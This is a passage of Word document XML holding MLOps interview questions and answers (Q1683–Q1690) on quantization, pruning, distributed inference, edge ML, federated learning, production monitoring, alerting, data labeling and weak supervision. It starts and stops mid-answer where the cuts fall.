        <w:t xml:space="preserve">      * Quantization applied after model training.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy and fast implementation.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Quantization-Aware Training (QAT)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model is trained while simulating quantization effects.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provides better accuracy compared to PTQ.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Dynamic Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Quantization happens dynamically during inference.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Static Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Activations and weights are quantized beforehand using calibration datasets.</w:t>
        <w:br/>
        <w:t>Benefits of Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smaller model size</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lower memory consumption</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced power usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better hardware efficiency</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Possible accuracy degradation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hardware compatibility considerations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Additional calibration and testing requirements</w:t>
        <w:br/>
        <w:t>Popular Tools and Frameworks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Lite</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorRT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX Runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OpenVINO</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, quantization is an important inference optimization technique for deploying scalable and efficient AI models in cloud, edge, and mobile environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1683. What is pruning in ML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pruning in Machine Learning is a model optimization technique where unnecessary or less important parameters, weights, neurons, or connections are removed from a neural network to make the model smaller and more efficient.</w:t>
        <w:br/>
        <w:t>The main goal of pruning is to reduce model complexity while maintaining acceptable accuracy.</w:t>
        <w:br/>
        <w:t>Pruning is commonly used to optimize deep learning models for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced memory usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lower storage requirements</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient edge and mobile deployment</w:t>
        <w:br/>
        <w:t>How Pruning Works</w:t>
        <w:br/>
        <w:t>During training or after training, the model identifies weights or neurons that contribute very little to predictions and removes them.</w:t>
        <w:br/>
        <w:t>For example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Very small weight values close to zero are removed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Unused neurons or channels are eliminated.</w:t>
        <w:br/>
        <w:t>Types of Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Weight Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removes individual low-importance weights.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Neuron Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removes entire neurons from the network.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Structured Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removes filters, channels, or layers in a structured way.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * More hardware-efficient.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Unstructured Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Removes random individual weights.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Achieves higher compression but less hardware optimization.</w:t>
        <w:br/>
        <w:t>Benefits of Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smaller model size</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster inference time</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced computational cost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lower power consumption</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better deployment efficiency on edge devices</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Potential loss of model accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requires fine-tuning after pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hardware optimization limitations for unstructured pruning</w:t>
        <w:br/>
        <w:t>Popular Tools and Frameworks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Model Optimization Toolkit</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorRT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OpenVINO</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, pruning is an important inference optimization technique used to deploy lightweight, scalable, and high-performance AI models in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1684. Explain distributed inference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed inference is a technique where machine learning model predictions are processed across multiple machines, GPUs, or servers instead of a single system to improve scalability, throughput, and performance.</w:t>
        <w:br/>
        <w:t>It is mainly used for serving large AI models or handling high volumes of inference requests in production environments.</w:t>
        <w:br/>
        <w:t>In distributed inference, incoming prediction requests are distributed across multiple compute resources so that inference workloads can run in parallel.</w:t>
        <w:br/>
        <w:t>Why Distributed Inference is Needed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large Language Models (LLMs) are too large for one GPU</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High traffic applications require low latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time AI systems need scalable prediction serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enterprise systems require high availability and fault tolerance</w:t>
        <w:br/>
        <w:t>Common Distributed Inference Approaches</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data Parallel Inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multiple replicas of the same model handle different inference requests simultaneously.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Model Parallel Inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Different parts of the model are distributed across multiple GPUs or nodes.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Useful for very large models.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Pipeline Parallelism</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model layers are split into stages across devices for sequential processing.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Batch Inference Distribution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large batches are divided and processed across distributed systems.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved throughput</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced inference latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient GPU utilization</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Network communication overhead</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Synchronization complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure cost management</w:t>
        <w:br/>
        <w:t>Popular Tools and Frameworks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorRT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ray Serve</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TorchServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * DeepSpeed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, distributed inference is critical for deploying large-scale, low-latency, and highly available AI systems in enterprise and cloud environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1685. What is edge ML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Edge ML (Edge Machine Learning) is the practice of running machine learning models directly on edge devices such as mobile phones, IoT devices, cameras, sensors, drones, or embedded systems instead of relying entirely on centralized cloud servers.</w:t>
        <w:br/>
        <w:t>In Edge ML, data is processed locally on the device where it is generated, enabling faster and more efficient real-time predictions.</w:t>
        <w:br/>
        <w:t>Common Edge ML Devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smartphones</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smart cameras</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT sensors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autonomous vehicles</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smartwatches</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Industrial devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Drones</w:t>
        <w:br/>
        <w:t>Benefits of Edge ML</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Low Latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time inference without sending data to the cloud.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Reduced Bandwidth Usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Less network communication required.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Improved Privacy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sensitive data remains on the local device.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Offline Capability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works even without internet connectivity.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Cost Optimization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces cloud processing costs.</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Limited CPU, GPU, and memory resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Battery and power constraints</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model size limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Device compatibility issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Difficult remote monitoring and updates</w:t>
        <w:br/>
        <w:t>Common Optimization Techniques</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Quantization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pruning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Knowledge distillation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hardware acceleration</w:t>
        <w:br/>
        <w:t>Popular Frameworks and Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Lite</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX Runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OpenVINO</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Core ML</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NVIDIA TensorRT</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Face recognition</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Voice assistants</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictive maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autonomous driving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smart surveillance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Healthcare monitoring</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, Edge ML requires efficient model packaging, lightweight deployment, remote device management, monitoring, and continuous model update strategies for large-scale distributed edge environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1686. Explain federated learning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Federated learning is a machine learning approach where models are trained across multiple devices or systems without transferring raw data to a central server.</w:t>
        <w:br/>
        <w:t>Instead of sharing data, each device trains the model locally and only sends model updates or gradients to a central server for aggregation. This helps improve privacy and data security.</w:t>
        <w:br/>
        <w:t>Federated learning is commonly used in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mobile devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Healthcare systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Banking and finance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Edge AI applications</w:t>
        <w:br/>
        <w:t>How Federated Learning Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Central server sends the initial model to devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Each device trains the model locally using its own data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Devices send model updates, not raw data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Central server aggregates updates to create a global model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Updated global model is redistributed to devices</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better data privacy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced data transfer to cloud</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Compliance with regulations like GDPR</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time personalized learning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports distributed edge environments</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Communication overhead</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Device heterogeneity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Slow or unreliable devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security attacks on model updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Complex synchronization</w:t>
        <w:br/>
        <w:t>Types of Federated Learning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Cross-device Federated Learning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large number of edge devices participate.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Cross-silo Federated Learning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multiple organizations collaboratively train models.</w:t>
        <w:br/>
        <w:t>Popular Frameworks and Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Federated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PySyft</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Flower</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NVIDIA FLARE</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Smartphone keyboard prediction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Personalized recommendations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Medical AI collaboration across hospitals</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection across banks</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, federated learning introduces additional requirements for distributed orchestration, secure aggregation, monitoring, model versioning, and scalable edge-device management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1687. What is ML monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML monitoring is the process of continuously tracking and analyzing machine learning models, data, and infrastructure in production to ensure the system performs reliably and accurately over time.</w:t>
        <w:br/>
        <w:t>The goal of ML monitoring is to detect issues early and maintain model quality, business performance, and operational stability.</w:t>
        <w:br/>
        <w:t>Key Areas of ML Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Model Performance Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks metrics such as accuracy, precision, recall, F1-score, and prediction quality.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detects missing values, schema changes, outliers, and data drift.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Concept Drift Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Identifies changes in relationships between input data and target outputs.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Prediction Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitors prediction distribution, confidence scores, and anomalies.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Infrastructure Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks CPU, GPU, memory, storage, and network utilization.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Latency and Throughput Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Measures inference response time and request handling capacity.</w:t>
        <w:br/>
        <w:t>Why ML Monitoring is Important</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detects model degradation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevents inaccurate predictions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports automated retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improves reliability and scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Helps maintain compliance and governance</w:t>
        <w:br/>
        <w:t>Common ML Monitoring Metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accuracy drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prediction drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Inference latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Error rates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource utilization</w:t>
        <w:br/>
        <w:t>Popular Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Evidently AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * WhyLabs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Arize AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, ML monitoring is a critical production practice that enables observability, automated alerting, retraining decisions, troubleshooting, and continuous improvement of machine learning systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1688. Explain alerting in ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alerting in ML systems is the process of automatically detecting and notifying teams about issues, anomalies, or performance degradation in machine learning pipelines, models, or infrastructure.</w:t>
        <w:br/>
        <w:t>The main purpose of alerting is to ensure production ML systems remain reliable, accurate, and available by enabling rapid detection and response to problems.</w:t>
        <w:br/>
        <w:t>Common Alerting Areas in ML Systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Model Performance Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Triggered when accuracy, precision, recall, or other metrics drop below thresholds.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data Drift Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detect changes in input data distribution compared to training data.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Concept Drift Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detect changes in relationships between features and target outcomes.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Inference Latency Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Triggered when prediction response time becomes too high.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Infrastructure Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitor CPU, GPU, memory, storage, and network utilization.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Pipeline Failure Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detect failed training jobs, ETL issues, or deployment failures.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      7. Prediction Anomaly Alerts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Identify unusual prediction patterns or abnormal outputs.</w:t>
        <w:br/>
        <w:t>Common Alerting Workflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Monitoring systems collect metrics and logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Thresholds or anomaly detection rules are applied</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Alerts are triggered when conditions are violated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Notifications are sent through email, Slack, PagerDuty, or incident management systems</w:t>
        <w:br/>
        <w:t>Benefits of Alerting</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster incident response</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improved model reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated operational monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better SLA and compliance management</w:t>
        <w:br/>
        <w:t>Popular Tools Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PagerDuty</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Datadog</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Evidently AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ELK Stack</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, alerting is essential for proactive monitoring, operational stability, automated remediation, and maintaining production-grade AI systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1689. What is data labeling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data labeling is the process of identifying, tagging, or annotating raw data with meaningful labels so that machine learning models can learn patterns from the data during training.</w:t>
        <w:br/>
        <w:t>The labeled data acts as ground truth for supervised learning models.</w:t>
        <w:br/>
        <w:t>Types of Data Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Image Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bounding boxes, segmentation, facial landmarks, object tagging.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Text Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sentiment analysis, named entity recognition, spam classification.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Audio Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Speech transcription, speaker identification, sound classification.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Video Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Object tracking, activity recognition, frame annotation.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Email marked as “Spam” or “Not Spam”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Image tagged as “Cat” or “Dog”</w:t>
        <w:br/>
        <w:t>Importance of Data Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improves model accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables supervised learning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Helps models understand patterns correctly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Critical for AI training quality</w:t>
        <w:br/>
        <w:t>Common Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Time-consuming process</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Expensive for large datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Human annotation errors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data consistency and quality management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scalability issues</w:t>
        <w:br/>
        <w:t>Labeling Approaches</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manual labeling by humans</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Semi-supervised labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Active learning-assisted labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated labeling using AI models</w:t>
        <w:br/>
        <w:t>Popular Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Label Studio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CVAT</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SuperAnnotate</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Amazon SageMaker Ground Truth</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, data labeling is a foundational step in building high-quality ML systems because model performance heavily depends on accurate and consistent labeled datasets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1690. Explain weak supervision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Weak supervision is a machine learning approach where models are trained using partially labeled, noisy, or imperfect data instead of fully accurate manually labeled datasets.</w:t>
        <w:br/>
        <w:t>The goal is to reduce the cost and effort of large-scale data labeling while still building effective ML models.</w:t>
        <w:br/>
        <w:t>Instead of relying only on human-annotated ground truth data, weak supervision generates approximate labels using automated or heuristic methods.</w:t>
        <w:br/>
        <w:t>Common Sources of Weak Supervision</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Heuristic Rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rule-based labeling using domain knowledge.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Distant Supervision</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Labels generated from external databases or existing systems.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Programmatic Labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated labeling functions create approximate labels.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Crowdsourced Labels</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Labels collected from multiple non-expert annotators.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Pseudo-labeling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictions from an existing model are used as labels for new data.</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Using keywords like “excellent” or “bad” to automatically label sentiment data instead of manually annotating every review.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduces manual labeling cost</w:t>
        <w:br/>
